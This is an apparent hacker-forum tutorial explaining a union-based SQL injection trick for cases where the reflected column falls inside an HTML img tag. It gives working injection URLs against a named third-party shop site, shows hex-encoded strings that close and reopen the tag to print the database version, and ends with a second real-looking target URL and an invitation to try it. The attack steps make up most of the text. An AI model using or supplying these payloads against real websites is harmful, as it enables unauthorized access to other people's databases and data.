[SQLI TRICK] Injection Into Html Tag [TUT]

This tut will teach you how to inject when the injection gets into html tag.
lets start.
if we have this site-

Code:

www.marsfigures.com/main.php?id=-2 union select 1,2,3--

(ignore the errors above)
we cant see the vuln column on the screen.
so,we replacing the columns like that-

Code:

www.marsfigures.com/main.php?id=-2 union select 1111,2222,3333--

i did this,because i want to search them in the source code.
right click > view source
now we in the source,lets find them.
ctrl f,and then '1111' or '2222' or '3333'

we can see that the columns 2222 is in html tag.
lets inject in 2.
column 2 is inside a "<img src="injection">".
so we are closing the tag,and then inject normally,like that-

Code:

http://www.marsfigures.com/main.php?id=-2 union select 1111,concat(0x223e,@@version),3333--

0x = prefix of hex.
223e = ">
so the final-
<img src=''''/>injection

now we can see our injection on the screen,but we want it to be clean.
so we are opening the tag again,like that-

Code:

http://www.marsfigures.com/main.php?id=-2 union select 1111,concat(0x223e,@@version,0x3c696d67207372633d22),3333--

3c696d67207372633d22 = <img src="
final-
<img src=''''/>injection<img src=''....

ts not always have to be ">. it can be </title> or </script> or anything else,always check the source code.

hope you learned something

http://www.audiotrends.com.au/Favourite.html?action=viewProduct&itemId=1192*0 union (select 1,2,3,4,5,6)--+

Try YourSelf ..It Will be sloved as I Benzi Solved ...

Author ::: BENZi

Posted in SQlbasics , SQLINJECTION